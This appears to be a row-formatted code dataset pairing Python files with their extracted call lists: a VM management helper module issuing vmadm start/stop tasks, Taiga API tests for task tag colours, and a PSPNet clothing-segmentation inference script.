| [((354, 373), 'main.LOADERS.publication_loader.PublicationLoader', 'PublicationLoader', ([], {}), '()\n', (371, 373), False, 'from main.LOADERS.publication_loader import PublicationLoader\n'), ((405, 420), 'main.MONGODB_PUSHERS.mongodb_pusher.MongoDbPusher', 'MongoDbPusher', ([], {}), '()\n', (418, 420), False, 'from main.MONGODB_PUSHERS.mongodb_pusher import MongoDbPusher\n'), ((450, 464), 'main.NLP.PREPROCESSING.preprocessor.Preprocessor', 'Preprocessor', ([], {}), '()\n', (462, 464), False, 'from main.NLP.PREPROCESSING.preprocessor import Preprocessor\n'), ((865, 950), 'sys.stdout.write', 'sys.stdout.write', (["('[%s] %s%s %s %s\\r' % (bar, percents, '%', custom_text, suffix))"], {}), "('[%s] %s%s %s %s\\r' % (bar, percents, '%', custom_text,\n suffix))\n", (881, 950), False, 'import os, sys, re\n'), ((955, 973), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (971, 973), False, 'import os, sys, re\n'), ((2910, 2944), 'json.dump', 'json.dump', (['resulting_data', 'outfile'], {}), '(resulting_data, outfile)\n', (2919, 2944), False, 'import json\n')] |
from core.celery.config import ERIGONES_TASK_USER
from que.tasks import execute, get_task_logger
from vms.models import SnapshotDefine, Snapshot, BackupDefine, Backup, IPAddress
logger = get_task_logger(__name__)
def is_vm_missing(vm, msg):
"""
Check failed command output and return True if VM is not on compute node.
"""
check_str = vm.hostname + ': No such zone configured'
return check_str in msg
def vm_delete_snapshots_of_removed_disks(vm):
"""
This helper function deletes snapshots for VM with changing disk IDs. Bug #chili-363
++ Bug #chili-220 - removing snapshot and backup definitions for removed disks.
"""
removed_disk_ids = [Snapshot.get_real_disk_id(i) for i in vm.create_json_update_disks().get('remove_disks', [])]
if removed_disk_ids:
Snapshot.objects.filter(vm=vm, disk_id__in=removed_disk_ids).delete()
SnapshotDefine.objects.filter(vm=vm, disk_id__in=removed_disk_ids).delete()
Backup.objects.filter(vm=vm, disk_id__in=removed_disk_ids, last=True).update(last=False)
BackupDefine.objects.filter(vm=vm, disk_id__in=removed_disk_ids).delete()
return removed_disk_ids
def _reset_allowed_ip_usage(vm, ip):
"""Helper function used below. It sets the IP usage back to VM [1] only if other VMs, which use the address in
allowed_ips are in notcreated state."""
if all(other_vm.is_notcreated() for other_vm in ip.vms.exclude(uuid=vm.uuid)):
ip.usage = IPAddress.VM
ip.save()
def _is_ip_ok(ip_queryset, vm_ip, vm_network_uuid):
"""Helper function used below. Return True if vm_ip (string) is "dhcp" or is found in the IPAddress queryset
and has the expected usage flag and subnet uuid."""
if vm_ip == 'dhcp':
return True
return any(ip.ip == vm_ip and ip.subnet.uuid == vm_network_uuid and ip.usage == IPAddress.VM_REAL
for ip in ip_queryset)
def vm_update_ipaddress_usage(vm):
"""
This helper function is responsible for updating IPAddress.usage and IPAddress.vm of server IPs (#chili-615,1029),
by removing association from IPs that, are not set on any NIC and:
- when a VM is deleted all IP usages are set to IPAddress.VM (in DB) and
- when a VM is created or updated all IP usages are set to IPAddress.VM_REAL (on hypervisor) and
Always call this function _only_ after vm.json_active is synced with vm.json!!!
In order to properly understand this code you have understand the association between an IPAddress and Vm model.
This function may raise a ValueError if the VM and IP address were not properly associated (e.g. via vm_define_nic).
"""
current_ips = set(vm.json_active_get_ips(primary_ips=True, allowed_ips=False))
current_ips.update(vm.json_get_ips(primary_ips=True, allowed_ips=False))
current_allowed_ips = set(vm.json_active_get_ips(primary_ips=False, allowed_ips=True))
current_allowed_ips.update(vm.json_get_ips(primary_ips=False, allowed_ips=True))
# Return old IPs back to IP pool, so they can be used again
vm.ipaddress_set.exclude(ip__in=current_ips).update(vm=None, usage=IPAddress.VM)
# Remove association of removed vm.allowed_ips
for ip in vm.allowed_ips.exclude(ip__in=current_allowed_ips):
ip.vms.remove(vm)
_reset_allowed_ip_usage(vm, ip)
if vm.is_notcreated():
# Server was deleted from hypervisor
vm.ipaddress_set.filter(usage=IPAddress.VM_REAL).update(usage=IPAddress.VM)
for ip in vm.allowed_ips.filter(usage=IPAddress.VM_REAL):
_reset_allowed_ip_usage(vm, ip)
return
# Server was updated or created
vm.ipaddress_set.filter(usage=IPAddress.VM).update(usage=IPAddress.VM_REAL)
vm.allowed_ips.filter(usage=IPAddress.VM).update(usage=IPAddress.VM_REAL)
# The VM configuration may be changed directly on the hypervisor, thus the VM could have
# new NICs and IP addresses which configuration bypassed our API - issue #168.
vm_ips = vm.ipaddress_set.select_related('subnet').filter(usage=IPAddress.VM_REAL)
vm_allowed_ips = vm.allowed_ips.select_related('subnet').filter(usage=IPAddress.VM_REAL)
# For issue #168 we have to check the VM<->IPAddress association in a loop for each NIC, because we need to
# match the NIC.network_uuid with a Subnet.
for nic_id, nic in enumerate(vm.json_active_get_nics(), 1):
network_uuid = nic.get('network_uuid', None)
if network_uuid:
ip = nic.get('ip', '')
allowed_ips = nic.get('allowed_ips', [])
if ip:
logger.debug('VM: %s | NIC ID: %s | NIC network: %s | IP address: %s', vm, nic_id, network_uuid, ip)
if not _is_ip_ok(vm_ips, ip, network_uuid):
raise ValueError('VM %s NIC ID %s IP address %s is not properly associated with VM!' %
(vm, nic_id, ip))
for ip in allowed_ips:
logger.debug('VM: %s | NIC ID: %s | NIC network: %s | IP address: %s', vm, nic_id, network_uuid, ip)
if not _is_ip_ok(vm_allowed_ips, ip, network_uuid):
raise ValueError('VM %s NIC ID %s allowed IP address %s is not properly associated with VM!' %
(vm, nic_id, ip))
else:
raise ValueError('VM %s NIC ID %s does not have a network uuid!' % (vm, nic_id))
def vm_deploy(vm, force_stop=False):
"""
Internal API call used for finishing VM deploy;
Actually cleaning the json and starting the VM.
"""
if force_stop: # VM is running without OS -> stop
cmd = 'vmadm stop %s -F >/dev/null 2>/dev/null; vmadm get %s 2>/dev/null' % (vm.uuid, vm.uuid)
else: # VM is stopped and deployed -> start
cmd = 'vmadm start %s >/dev/null 2>/dev/null; vmadm get %s 2>/dev/null' % (vm.uuid, vm.uuid)
msg = 'Deploy server'
lock = 'vmadm deploy ' + vm.uuid
meta = {
'output': {
'returncode': 'returncode',
'stderr': 'message',
'stdout': 'json'
},
'replace_stderr': ((vm.uuid, vm.hostname),),
'msg': msg, 'vm_uuid': vm.uuid
}
callback = ('api.vm.base.tasks.vm_deploy_cb', {'vm_uuid': vm.uuid})
return execute(ERIGONES_TASK_USER, None, cmd, meta=meta, lock=lock, callback=callback,
queue=vm.node.fast_queue, nolog=True, ping_worker=False, check_user_tasks=False)
def vm_reset(vm):
"""
Internal API call used for VM reboots in emergency situations.
"""
cmd = 'vmadm stop %s -F; vmadm start %s' % (vm.uuid, vm.uuid)
return execute(ERIGONES_TASK_USER, None, cmd, callback=False, queue=vm.node.fast_queue, nolog=True,
check_user_tasks=False)
def vm_update(vm):
"""
Internal API used for updating VM if there were changes in json detected.
"""
logger.info('Running PUT vm_manage(%s), because something (vnc port?) has changed', vm)
from api.vm.base.views import vm_manage
from api.utils.request import get_dummy_request
from api.utils.views import call_api_view
request = get_dummy_request(vm.dc, method='PUT', system_user=True)
res = call_api_view(request, 'PUT', vm_manage, vm.hostname)
if res.status_code == 201:
logger.warn('PUT vm_manage(%s) was successful: %s', vm, res.data)
else:
logger.error('PUT vm_manage(%s) failed: %s (%s): %s', vm, res.status_code, res.status_text, res.data)
| [
"vms.models.SnapshotDefine.objects.filter",
"vms.models.Snapshot.objects.filter",
"api.utils.request.get_dummy_request",
"que.tasks.get_task_logger",
"vms.models.Backup.objects.filter",
"que.tasks.execute",
"api.utils.views.call_api_view",
"vms.models.Snapshot.get_real_disk_id",
"vms.models.BackupDefine.objects.filter"
]
| [((188, 213), 'que.tasks.get_task_logger', 'get_task_logger', (['__name__'], {}), '(__name__)\n', (203, 213), False, 'from que.tasks import execute, get_task_logger\n'), ((6278, 6447), 'que.tasks.execute', 'execute', (['ERIGONES_TASK_USER', 'None', 'cmd'], {'meta': 'meta', 'lock': 'lock', 'callback': 'callback', 'queue': 'vm.node.fast_queue', 'nolog': '(True)', 'ping_worker': '(False)', 'check_user_tasks': '(False)'}), '(ERIGONES_TASK_USER, None, cmd, meta=meta, lock=lock, callback=\n callback, queue=vm.node.fast_queue, nolog=True, ping_worker=False,\n check_user_tasks=False)\n', (6285, 6447), False, 'from que.tasks import execute, get_task_logger\n'), ((6638, 6759), 'que.tasks.execute', 'execute', (['ERIGONES_TASK_USER', 'None', 'cmd'], {'callback': '(False)', 'queue': 'vm.node.fast_queue', 'nolog': '(True)', 'check_user_tasks': '(False)'}), '(ERIGONES_TASK_USER, None, cmd, callback=False, queue=vm.node.\n fast_queue, nolog=True, check_user_tasks=False)\n', (6645, 6759), False, 'from que.tasks import execute, get_task_logger\n'), ((7137, 7193), 'api.utils.request.get_dummy_request', 'get_dummy_request', (['vm.dc'], {'method': '"""PUT"""', 'system_user': '(True)'}), "(vm.dc, method='PUT', system_user=True)\n", (7154, 7193), False, 'from api.utils.request import get_dummy_request\n'), ((7204, 7257), 'api.utils.views.call_api_view', 'call_api_view', (['request', '"""PUT"""', 'vm_manage', 'vm.hostname'], {}), "(request, 'PUT', vm_manage, vm.hostname)\n", (7217, 7257), False, 'from api.utils.views import call_api_view\n'), ((686, 714), 'vms.models.Snapshot.get_real_disk_id', 'Snapshot.get_real_disk_id', (['i'], {}), '(i)\n', (711, 714), False, 'from vms.models import SnapshotDefine, Snapshot, BackupDefine, Backup, IPAddress\n'), ((812, 872), 'vms.models.Snapshot.objects.filter', 'Snapshot.objects.filter', ([], {'vm': 'vm', 'disk_id__in': 'removed_disk_ids'}), '(vm=vm, disk_id__in=removed_disk_ids)\n', (835, 872), False, 'from vms.models import SnapshotDefine, Snapshot, BackupDefine, Backup, IPAddress\n'), ((890, 956), 'vms.models.SnapshotDefine.objects.filter', 'SnapshotDefine.objects.filter', ([], {'vm': 'vm', 'disk_id__in': 'removed_disk_ids'}), '(vm=vm, disk_id__in=removed_disk_ids)\n', (919, 956), False, 'from vms.models import SnapshotDefine, Snapshot, BackupDefine, Backup, IPAddress\n'), ((974, 1043), 'vms.models.Backup.objects.filter', 'Backup.objects.filter', ([], {'vm': 'vm', 'disk_id__in': 'removed_disk_ids', 'last': '(True)'}), '(vm=vm, disk_id__in=removed_disk_ids, last=True)\n', (995, 1043), False, 'from vms.models import SnapshotDefine, Snapshot, BackupDefine, Backup, IPAddress\n'), ((1071, 1135), 'vms.models.BackupDefine.objects.filter', 'BackupDefine.objects.filter', ([], {'vm': 'vm', 'disk_id__in': 'removed_disk_ids'}), '(vm=vm, disk_id__in=removed_disk_ids)\n', (1098, 1135), False, 'from vms.models import SnapshotDefine, Snapshot, BackupDefine, Backup, IPAddress\n')] |
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from unittest import mock
from collections import OrderedDict
from django.core.urlresolvers import reverse
from taiga.base.utils import json
from .. import factories as f
import pytest
pytestmark = pytest.mark.django_db
def test_api_task_add_new_tags_with_error(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [],
"version": task.version
}
client.login(task.owner)
data["tags"] = [1]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [["back"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [["back", "#cccc"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [[1, "#ccc"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
def test_api_task_add_new_tags_without_colors(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [
["back", None],
["front", None],
["ux", None]
],
"version": task.version
}
client.login(task.owner)
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 200, response.data
tags_colors = OrderedDict(project.tags_colors)
assert not tags_colors.keys()
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert "back" in tags_colors and "front" in tags_colors and "ux" in tags_colors
def test_api_task_add_new_tags_with_colors(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [
["back", "#fff8e7"],
["front", None],
["ux", "#fabada"]
],
"version": task.version
}
client.login(task.owner)
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 200, response.data
tags_colors = OrderedDict(project.tags_colors)
assert not tags_colors.keys()
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert "back" in tags_colors and "front" in tags_colors and "ux" in tags_colors
assert tags_colors["back"] == "#fff8e7"
assert tags_colors["ux"] == "#fabada"
def test_api_create_new_task_with_tags(client):
project = f.ProjectFactory.create(tags_colors=[["front", "#aaaaaa"], ["ux", "#fabada"]])
status = f.TaskStatusFactory.create(project=project)
project.default_task_status = status
project.save()
f.MembershipFactory.create(project=project, user=project.owner, is_admin=True)
url = reverse("tasks-list")
data = {
"subject": "Test user story",
"project": project.id,
"tags": [
["back", "#fff8e7"],
["front", "#bbbbbb"],
["ux", None]
]
}
client.login(project.owner)
response = client.json.post(url, json.dumps(data))
assert response.status_code == 201, response.data
task_tags_colors = OrderedDict(response.data["tags"])
assert task_tags_colors["back"] == "#fff8e7"
assert task_tags_colors["front"] == "#aaaaaa"
assert task_tags_colors["ux"] == "#fabada"
tags_colors = OrderedDict(project.tags_colors)
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert tags_colors["back"] == "#fff8e7"
assert tags_colors["ux"] == "#fabada"
assert tags_colors["front"] == "#aaaaaa"
| [
"collections.OrderedDict",
"taiga.base.utils.json.dumps",
"django.core.urlresolvers.reverse"
]
| [((1402, 1449), 'django.core.urlresolvers.reverse', 'reverse', (['"""tasks-detail"""'], {'kwargs': "{'pk': task.pk}"}), "('tasks-detail', kwargs={'pk': task.pk})\n", (1409, 1449), False, 'from django.core.urlresolvers import reverse\n'), ((2547, 2594), 'django.core.urlresolvers.reverse', 'reverse', (['"""tasks-detail"""'], {'kwargs': "{'pk': task.pk}"}), "('tasks-detail', kwargs={'pk': task.pk})\n", (2554, 2594), False, 'from django.core.urlresolvers import reverse\n'), ((2918, 2950), 'collections.OrderedDict', 'OrderedDict', (['project.tags_colors'], {}), '(project.tags_colors)\n', (2929, 2950), False, 'from collections import OrderedDict\n'), ((3035, 3067), 'collections.OrderedDict', 'OrderedDict', (['project.tags_colors'], {}), '(project.tags_colors)\n', (3046, 3067), False, 'from collections import OrderedDict\n'), ((3436, 3483), 'django.core.urlresolvers.reverse', 'reverse', (['"""tasks-detail"""'], {'kwargs': "{'pk': task.pk}"}), "('tasks-detail', kwargs={'pk': task.pk})\n", (3443, 3483), False, 'from django.core.urlresolvers import reverse\n'), ((3816, 3848), 'collections.OrderedDict', 'OrderedDict', (['project.tags_colors'], {}), '(project.tags_colors)\n', (3827, 3848), False, 'from collections import OrderedDict\n'), ((3933, 3965), 'collections.OrderedDict', 'OrderedDict', (['project.tags_colors'], {}), '(project.tags_colors)\n', (3944, 3965), False, 'from collections import OrderedDict\n'), ((4489, 4510), 'django.core.urlresolvers.reverse', 'reverse', (['"""tasks-list"""'], {}), "('tasks-list')\n", (4496, 4510), False, 'from django.core.urlresolvers import reverse\n'), ((4887, 4921), 'collections.OrderedDict', 'OrderedDict', (["response.data['tags']"], {}), "(response.data['tags'])\n", (4898, 4921), False, 'from collections import OrderedDict\n'), ((5088, 5120), 'collections.OrderedDict', 'OrderedDict', (['project.tags_colors'], {}), '(project.tags_colors)\n', (5099, 5120), False, 'from collections import OrderedDict\n'), ((5171, 5203), 'collections.OrderedDict', 'OrderedDict', (['project.tags_colors'], {}), '(project.tags_colors)\n', (5182, 5203), False, 'from collections import OrderedDict\n'), ((1613, 1629), 'taiga.base.utils.json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (1623, 1629), False, 'from taiga.base.utils import json\n'), ((1789, 1805), 'taiga.base.utils.json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (1799, 1805), False, 'from taiga.base.utils import json\n'), ((1974, 1990), 'taiga.base.utils.json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (1984, 1990), False, 'from taiga.base.utils import json\n'), ((2153, 2169), 'taiga.base.utils.json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (2163, 2169), False, 'from taiga.base.utils import json\n'), ((2826, 2842), 'taiga.base.utils.json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (2836, 2842), False, 'from taiga.base.utils import json\n'), ((3725, 3741), 'taiga.base.utils.json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (3735, 3741), False, 'from taiga.base.utils import json\n'), ((4791, 4807), 'taiga.base.utils.json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (4801, 4807), False, 'from taiga.base.utils import json\n')] |
#!/usr/local/bin/python3
# -*- coding: utf-8 -*-
import os
import argparse
import logging
import numpy as np
from PIL import Image
import matplotlib
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
from torchvision import transforms
import cv2
import tqdm
from net.pspnet import PSPNet
models = {
'squeezenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='squeezenet'),
'densenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=1024, deep_features_size=512, backend='densenet'),
'resnet18': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet18'),
'resnet34': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet34'),
'resnet50': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet50'),
'resnet101': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet101'),
'resnet152': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet152')
}
parser = argparse.ArgumentParser(description="Pyramid Scene Parsing Network")
parser.add_argument('--models-path', type=str, default='./checkpoints',
help='Path for storing model snapshots')
parser.add_argument('--backend', type=str,
default='densenet', help='Feature extractor')
parser.add_argument('--num-classes', type=int,
default=20, help="Number of classes.")
args = parser.parse_args()
def build_network(snapshot, backend):
epoch = 0
backend = backend.lower()
net = models[backend]()
net = nn.DataParallel(net)
if snapshot is not None:
_, epoch = os.path.basename(snapshot).split('_')
if not epoch == 'last':
epoch = int(epoch)
net.load_state_dict(torch.load(
snapshot, map_location=torch.device('cpu')))
logging.info(
"Snapshot for epoch {} loaded from {}".format(epoch, snapshot))
if torch.cuda.is_available():
net = net.cuda()
return net, epoch
def get_transform():
transform_image_list = [
# transforms.Resize((192, 256), 3),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
]
return transforms.Compose(transform_image_list)
def show_image(img, pred):
fig, axes = plt.subplots(1, 2)
ax0, ax1 = axes
ax0.get_xaxis().set_ticks([])
ax0.get_yaxis().set_ticks([])
ax1.get_xaxis().set_ticks([])
ax1.get_yaxis().set_ticks([])
classes = np.array(('Background', # always index 0
'Hat', 'Hair', 'Glove', 'Sunglasses',
'UpperClothes', 'Dress', 'Coat', 'Socks',
'Pants', 'Jumpsuits', 'Scarf', 'Skirt',
'Face', 'Left-arm', 'Right-arm', 'Left-leg',
'Right-leg', 'Left-shoe', 'Right-shoe',))
colormap = [(0, 0, 0),
(1, 0.25, 0), (0, 0.25, 0), (0.5, 0, 0.25), (1, 1, 1),
(1, 0.75, 0), (0, 0, 0.5), (0.5, 0.25, 0), (0.75, 0, 0.25),
(1, 0, 0.25), (0, 0.5, 0), (0.5, 0.5, 0), (0.25, 0, 0.5),
(1, 0, 0.75), (0, 0.5, 0.5), (0.25, 0.5, 0.5), (1, 0, 0),
(1, 0.25, 0), (0, 0.75, 0), (0.5, 0.75, 0), ]
cmap = matplotlib.colors.ListedColormap(colormap)
bounds = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
norm = matplotlib.colors.BoundaryNorm(bounds, cmap.N)
h, w, _ = pred.shape
def denormalize(img, mean, std):
c, _, _ = img.shape
for idx in range(c):
img[idx, :, :] = img[idx, :, :] * std[idx] + mean[idx]
return img
img = denormalize(img.cpu().numpy(), [0.485, 0.456, 0.406], [
0.229, 0.224, 0.225])
img = img.transpose(1, 2, 0).reshape((h, w, 3))
pred = pred.reshape((h, w))
# show image
ax0.set_title('img')
ax0.imshow(img)
ax1.set_title('pred')
mappable = ax1.imshow(pred, cmap=cmap, norm=norm)
# colorbar legend
cbar = plt.colorbar(mappable, ax=axes, shrink=0.7, )
cbar.ax.get_yaxis().set_ticks([])
for j, lab in enumerate(classes):
cbar.ax.text(2.3, (j + 0.45) / 20.0, lab, ha='left', va='center', )
plt.savefig(fname="./result.jpg")
print('result saved to ./result.jpg')
plt.show()
def main():
# --------------- model --------------- #
snapshot = os.path.join(args.models_path, args.backend, 'PSPNet_last')
net, starting_epoch = build_network(snapshot, args.backend)
net.eval()
# ------------ load image ------------ #
data_transform = get_transform()
imgfolder = 'ACGPN/ACGPN_testdata/test_img/'
savefolder = 'ACGPN/ACGPN_testdata/test_humanparse/'
if not os.path.exists(savefolder):
os.mkdir(savefolder)
imglist = os.listdir(imgfolder)
for imgname in tqdm.tqdm(imglist):
imgpath = os.path.join(imgfolder, imgname)
print(imgpath)
img = Image.open(imgpath)
img = data_transform(img)
if torch.cuda.is_available():
img = img.cuda()
with torch.no_grad():
pred, _ = net(img.unsqueeze(dim=0))
pred = pred.squeeze(dim=0)
pred = pred.cpu().numpy().transpose(1, 2, 0)
pred = np.asarray(np.argmax(pred, axis=2),
dtype=np.uint8).reshape((256, 192, 1))
pred_3 = np.repeat(pred, 3, axis = 2)
savepath = os.path.join(savefolder, imgname)
cv2.imwrite(savepath, pred_3)
if __name__ == '__main__':
main()
| [
"numpy.array",
"torch.cuda.is_available",
"os.path.exists",
"os.listdir",
"numpy.repeat",
"argparse.ArgumentParser",
"matplotlib.colors.ListedColormap",
"os.mkdir",
"torchvision.transforms.ToTensor",
"matplotlib.pyplot.savefig",
"numpy.argmax",
"torchvision.transforms.Normalize",
"torchvision.transforms.Compose",
"matplotlib.pyplot.show",
"torch.device",
"cv2.imwrite",
"PIL.Image.open",
"matplotlib.pyplot.colorbar",
"os.path.join",
"torch.nn.DataParallel",
"tqdm.tqdm",
"os.path.basename",
"net.pspnet.PSPNet",
"torch.no_grad",
"matplotlib.colors.BoundaryNorm",
"matplotlib.pyplot.subplots"
]
| [((1113, 1181), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Pyramid Scene Parsing Network"""'}), "(description='Pyramid Scene Parsing Network')\n", (1136, 1181), False, 'import argparse\n'), ((1679, 1699), 'torch.nn.DataParallel', 'nn.DataParallel', (['net'], {}), '(net)\n', (1694, 1699), True, 'import torch.nn as nn\n'), ((2051, 2076), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (2074, 2076), False, 'import torch\n'), ((2345, 2385), 'torchvision.transforms.Compose', 'transforms.Compose', (['transform_image_list'], {}), '(transform_image_list)\n', (2363, 2385), False, 'from torchvision import transforms\n'), ((2431, 2449), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(2)'], {}), '(1, 2)\n', (2443, 2449), True, 'import matplotlib.pyplot as plt\n'), ((2621, 2862), 'numpy.array', 'np.array', (["('Background', 'Hat', 'Hair', 'Glove', 'Sunglasses', 'UpperClothes',\n 'Dress', 'Coat', 'Socks', 'Pants', 'Jumpsuits', 'Scarf', 'Skirt',\n 'Face', 'Left-arm', 'Right-arm', 'Left-leg', 'Right-leg', 'Left-shoe',\n 'Right-shoe')"], {}), "(('Background', 'Hat', 'Hair', 'Glove', 'Sunglasses',\n 'UpperClothes', 'Dress', 'Coat', 'Socks', 'Pants', 'Jumpsuits', 'Scarf',\n 'Skirt', 'Face', 'Left-arm', 'Right-arm', 'Left-leg', 'Right-leg',\n 'Left-shoe', 'Right-shoe'))\n", (2629, 2862), True, 'import numpy as np\n'), ((3385, 3427), 'matplotlib.colors.ListedColormap', 'matplotlib.colors.ListedColormap', (['colormap'], {}), '(colormap)\n', (3417, 3427), False, 'import matplotlib\n'), ((3541, 3587), 'matplotlib.colors.BoundaryNorm', 'matplotlib.colors.BoundaryNorm', (['bounds', 'cmap.N'], {}), '(bounds, cmap.N)\n', (3571, 3587), False, 'import matplotlib\n'), ((4166, 4209), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['mappable'], {'ax': 'axes', 'shrink': '(0.7)'}), '(mappable, ax=axes, shrink=0.7)\n', (4178, 4209), True, 'import matplotlib.pyplot as plt\n'), ((4369, 4402), 'matplotlib.pyplot.savefig', 'plt.savefig', ([], {'fname': '"""./result.jpg"""'}), "(fname='./result.jpg')\n", (4380, 4402), True, 'import matplotlib.pyplot as plt\n'), ((4449, 4459), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4457, 4459), True, 'import matplotlib.pyplot as plt\n'), ((4535, 4594), 'os.path.join', 'os.path.join', (['args.models_path', 'args.backend', '"""PSPNet_last"""'], {}), "(args.models_path, args.backend, 'PSPNet_last')\n", (4547, 4594), False, 'import os\n'), ((4945, 4966), 'os.listdir', 'os.listdir', (['imgfolder'], {}), '(imgfolder)\n', (4955, 4966), False, 'import os\n'), ((4986, 5004), 'tqdm.tqdm', 'tqdm.tqdm', (['imglist'], {}), '(imglist)\n', (4995, 5004), False, 'import tqdm\n'), ((343, 434), 'net.pspnet.PSPNet', 'PSPNet', ([], {'sizes': '(1, 2, 3, 6)', 'psp_size': '(512)', 'deep_features_size': '(256)', 'backend': '"""squeezenet"""'}), "(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend=\n 'squeezenet')\n", (349, 434), False, 'from net.pspnet import PSPNet\n'), ((455, 545), 'net.pspnet.PSPNet', 'PSPNet', ([], {'sizes': '(1, 2, 3, 6)', 'psp_size': '(1024)', 'deep_features_size': '(512)', 'backend': '"""densenet"""'}), "(sizes=(1, 2, 3, 6), psp_size=1024, deep_features_size=512, backend=\n 'densenet')\n", (461, 545), False, 'from net.pspnet import PSPNet\n'), ((566, 655), 'net.pspnet.PSPNet', 'PSPNet', ([], {'sizes': '(1, 2, 3, 6)', 'psp_size': '(512)', 'deep_features_size': '(256)', 'backend': '"""resnet18"""'}), "(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend=\n 'resnet18')\n", (572, 655), False, 'from net.pspnet import PSPNet\n'), ((676, 765), 'net.pspnet.PSPNet', 'PSPNet', ([], {'sizes': '(1, 2, 3, 6)', 'psp_size': '(512)', 'deep_features_size': '(256)', 'backend': '"""resnet34"""'}), "(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend=\n 'resnet34')\n", (682, 765), False, 'from net.pspnet import PSPNet\n'), ((786, 877), 'net.pspnet.PSPNet', 'PSPNet', ([], {'sizes': '(1, 2, 3, 6)', 'psp_size': '(2048)', 'deep_features_size': '(1024)', 'backend': '"""resnet50"""'}), "(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend=\n 'resnet50')\n", (792, 877), False, 'from net.pspnet import PSPNet\n'), ((899, 991), 'net.pspnet.PSPNet', 'PSPNet', ([], {'sizes': '(1, 2, 3, 6)', 'psp_size': '(2048)', 'deep_features_size': '(1024)', 'backend': '"""resnet101"""'}), "(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend=\n 'resnet101')\n", (905, 991), False, 'from net.pspnet import PSPNet\n'), ((1013, 1105), 'net.pspnet.PSPNet', 'PSPNet', ([], {'sizes': '(1, 2, 3, 6)', 'psp_size': '(2048)', 'deep_features_size': '(1024)', 'backend': '"""resnet152"""'}), "(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend=\n 'resnet152')\n", (1019, 1105), False, 'from net.pspnet import PSPNet\n'), ((2229, 2250), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (2248, 2250), False, 'from torchvision import transforms\n'), ((2260, 2326), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (2280, 2326), False, 'from torchvision import transforms\n'), ((4874, 4900), 'os.path.exists', 'os.path.exists', (['savefolder'], {}), '(savefolder)\n', (4888, 4900), False, 'import os\n'), ((4910, 4930), 'os.mkdir', 'os.mkdir', (['savefolder'], {}), '(savefolder)\n', (4918, 